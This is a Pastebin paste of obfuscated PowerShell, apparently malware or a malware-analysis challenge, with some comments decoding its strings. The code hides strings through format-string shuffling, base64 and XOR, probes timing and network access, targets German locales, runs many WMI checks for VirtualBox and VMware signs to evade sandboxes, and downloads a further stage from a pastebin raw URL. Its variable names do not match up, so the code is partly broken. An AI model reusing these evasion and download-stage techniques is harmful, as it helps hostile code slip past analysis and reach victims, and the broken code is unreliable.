Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $webClientObj = New-Object System.Net.WebClient
- $cultureInfoObj = Get-Culture | Out-String
- $utfEnc = [System.Text.Encoding]::UTF8
- $parameter1 = ("{0}{2}{1}"-f'RhZH','g=','UB') # "{0}{2}{1}"-f'RhZH','g=','UB' -> RhZHUBg= (base64 encoded)
- $parameter2 = ("{2}{1}{0}"-f '=','CxY','RBYL')
- $parameter3 = ("{2}{0}{1}"-f 'EQB','xE=','SB')
- $parameter4 = ("{1}{2}{0}"-f '=','H','0cLUEc')
- $parameter5 = ("{0}{1}"-f 'FxEQDB','M=')
- ${ilLLLiiiLILililIli} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter2))
- ${LlliIiLIlIilLiiIlLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter1))
- ${iiLIiIliliILlIlLIiiLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter3))
- ${illlIillIllIIIiIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter5))
- ${IlllliiIlIliLllIiIiIIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter4))
- $parameter2Arr = $utfEnc.GetBytes(${illLliIILilILilIli})
- ${ilLLIiILiLLiiLLlll} = $utfEnc.GetBytes($parameter1)
- ${LlLIIiLiIilllII} = $utfEnc.GetBytes($parameter4)
- ${ILLlIIiIlliLlLlIi} = $utfEnc.GetBytes($parameter3)
- ${ilIlILLLLiIiiLiIIlLl} = $utfEnc.GetBytes($parameter5)
- $jfhArr = $utfEnc.GetBytes("jfh")
- startTime = (Get-Date).Millisecond
- IF ($webClientObj.DownloadString(("{6}{3}{0}{4}{1}{2}{5}" -f'tp:','/api.w','ipmani','t','/','a.com','h'))){ # http://api.wipmania.com
- Exit
- }
- $endTime = (Get-Date).Millisecond
- $duration = ($endTime - startTime) # measure how long it takes to get the web page
- IF($duration -gt 300){
- Write-Host ("{1}{0}{2}{3}"-f 'ad ','B','t','iming.') # bad timing
- } ELSE {}
- # Seltsam
- $targetCulture = 1961 - 930 # german
- IF($cultureInfoObj -match $targetCulture){${ililiLilILIIlllILIIiIlIillIILILLlLiI} = $(for (${I}=0; ${i} -lt $parameter2Arr.length;){
- for (${J}=0; ${J} -lt $jfhArr.length; ${J}++) {
- $parameter2Arr[${i}] -bxor $jfhArr[${J}]
- ${I}++
- if (${i} -ge $parameter2Arr.length) {
- ${j} = $jfhArr.length
- }
- }
- })} ELSE {${ILILILIlILiiLLlILiIIilIILliiLiLLLlII} = $(for (${i}=0; ${I} -lt ${LLLiiILIiiLllII}.length;){
- for (${j}=0; ${j} -lt $jfhArr.length; ${J}++) {
- ${LlliiiLIIILLlII}[${i}] -bxor $jfhArr[${j}]
- ${I}++
- if (${i} -ge ${llliIiliiILLlIi}.length) {
- ${j} = $jfhArr.length
- }
- }
- })}
- # VmJveHxWaXJ0dWFsfFZNd2FyZXxWTSB3YXJl -> Vbox|Virtual|VMware|VM ware
- $vmSigns = ("{0}{3}{6}{4}{9}{7}{1}{8}{10}{5}{2}"-f'VmJveH','Nd2F','3YXJl','xWa','dWF','TSB','XJ0','FZ','yZX','sf','xW')
- # select * from win32_pingstatus where address = '8.8.8.8'
- if (gwmi -query ((("{8}{0}{9}{7}{16}{6}{2}{10}{12}{11}{3}{5}{17}{1}{14}{13}{15}{4}" -f'elect','where ad','win','gstat','8EDz','us','om ','*','s',' ','3','in','2_p',' EDz','dress =','8.8.8.',' fr',' ')).replaCe('EDz',[STRing][CHAR]39))){Exit}
- # vm detection
- IF(((gwmi win32_baseboard).Product) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IllLIIIlILIlililiLiLIiIillLLlIilIllL} = ((("{7}{10}{8}{0}{3}{11}{1}{2}{4}{6}{5}{9}" -f '6','b26x','00b26x14','x00b2','b26','x00b26x','x00b26','b2','b2','00','6x00','6x00')) -REplACe'b26',[CHar]92)
- Write-Host ${ILLLIiILIlILilIlILiLIiiILLlLLiiLiLll}
- } ELSEIF((gwmi win32_pnpentity) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IlIliliLIlIiLLLIliIiiLIILLiIliLLllII} = ((("{10}{2}{9}{7}{0}{3}{8}{4}{1}{5}{6}" -f 'r8x1a','x','00v','v','05vr8','10v','r8x04','8x00v','r8x00vr8x','r','vr8x')).rEPLACE('vr8','\'))
- Write-Host ${IlllIlIIiIlLllLIililLLlIiILILIliLiLi}
- } ELSEIF(((gwmi win32_computersystem).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${illLIiilILiLililIliLIiiILLLLlIilIllL} = ((("{5}{3}{4}{2}{1}{6}{0}"-f '00cAMx01','cAM','Mx00','AMx01','cAMx00cA','c','x')).RepLAcE('cAM','\'))
- Write-Host ${illLiIiLililiLiLIlILIIiIlLlLliIlillL}
- } ELSEIF(((gwmi win32_diskdrive).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ILlLILIIiilLLllIIliLLLlIiILiliLiLIli} = ((("{3}{4}{5}{0}{2}{1}{6}" -f '01P9qx01P','P','9qx00','P','9qx0','1P9qxdaP9qx','9qx03')) -RePlaCe ([CHaR]80+[CHaR]57+[CHaR]113),[CHaR]92)
- Write-Host ${IlLliLiiIilllLLiILILLLliIILIlILILIlI}
- } ELSEIF(((gwmi win32_logicaldisk).VolumeName) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${iliLilIlIlIiLLliliIiiLIIllIilillllII} = ((("{5}{4}{2}{0}{1}{3}"-f'0{0}x00{0}x00{0}','x0','0}x0','1','{','{0}x01')) -f [CHAR]92)
- Write-Host ${IlLLIIIlILiLilIlilILiIIiLLLlLIiLiLLl}
- } ELSEIF(((gwmi win32_bios).Version) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ilLLILiiIiLlllliILiLLLliiIlIlIlIlili} = ((("{0}{5}{2}{6}{1}{4}{3}"-f'{0}x','0','1{','{0}x03','}x00','0','0}xda{0}x01{0}x01{'))-f [cHar]92)
- Write-Host ${illLiLIIIilLLLLIilILLLLIiILiLilililI}
- } ELSEIF(((gwmi win32_bios).SerialNumber) -eq "0"){
- ${IlLlilIIiILLlLLIiLILlLLIIiliLIlILilI} = ((("{8}{7}{0}{3}{2}{5}{9}{6}{1}{4}" -f'YGxda','x','8YGx018Y','8YGx01','03','Gx0','YG','18','8YGx0','08')) -rePLACe '8YG',[chaR]92)
- Write-Host ${ilLlIlIiIILLllLIilillLliiiLILilIlIli}
- } ELSEIF(((gwmi win32_bios).SMBIOSBIOSVersion) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IllliiilIlililILiLiliiiILLllliiLilLl} = ((("{7}{0}{1}{3}{4}{6}{5}{8}{2}"-f'00ZRC','x00ZRCx00','0','ZRCx00','ZRC','4ZRCx00ZRCx00Z','x1','ZRCx','RCx0')).RePlaCE('ZRC',[StrInG][chAR]92))
- Write-Host ${IlLLiiILILiLILiliLILiiiILllLLiiLIlll}
- } ELSEIF((gwmi win32_systemdriver) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IlllIiiLIlilIlilililIiiIlLLlliIlIlLL} = ((("{7}{5}{3}{2}{4}{1}{0}{6}"-f 'x000zB','B','010zBx000zBx','x','000z','zB','x01','0'))-CrePLACe ([cHar]48+[cHar]122+[cHar]66),[cHar]92)
- Write-Host ${ILLlIIiliLILILIlILIlIIiiLllllIiLiLLL}
- } ELSEIF((gwmi win32_service) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ILIlIlILiLiILLLILIiIilIIlLIiliLlLLIi} = ((("{7}{0}{4}{5}{10}{2}{8}{6}{3}{9}{1}"-f '}x00','04','0','x05{0}x10{0}','{0}x00{0','}x','0}','{0','}x00{','x','1a{'))-F[chAR]92)
- Write-Host ${ILlliLiIIILlllliiLIlLlLiIIlilililILI}
- } ELSE {
- #https://pastebin.com/raw/VbTHMA0T --> D4 C3 B2 A1 02 00
- ${IlLLiIiLILIlIliLIlILiiiiLLlLlIiLilll} = $webClientObj.DownloadString(("{5}{1}{2}{3}{0}{4}" -f 'w/VbTHMA','tps://pastebi','n.com/','ra','0T','ht'))
- ${ILLlILIiiIllllliILILLlliiiliLiLilILI} = ("[REDACTED]")
- ${iLLliiLI} = ${iLlLiiiLIlIlIliLiliLIIIIlllLLIiLilLl} + ${ILllIlIIIIlLlllIiLILllLiiIlILIlIlilI} + ${IliLiLILiliiLlliLiiiiLiIllIIlIllLLIi}
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement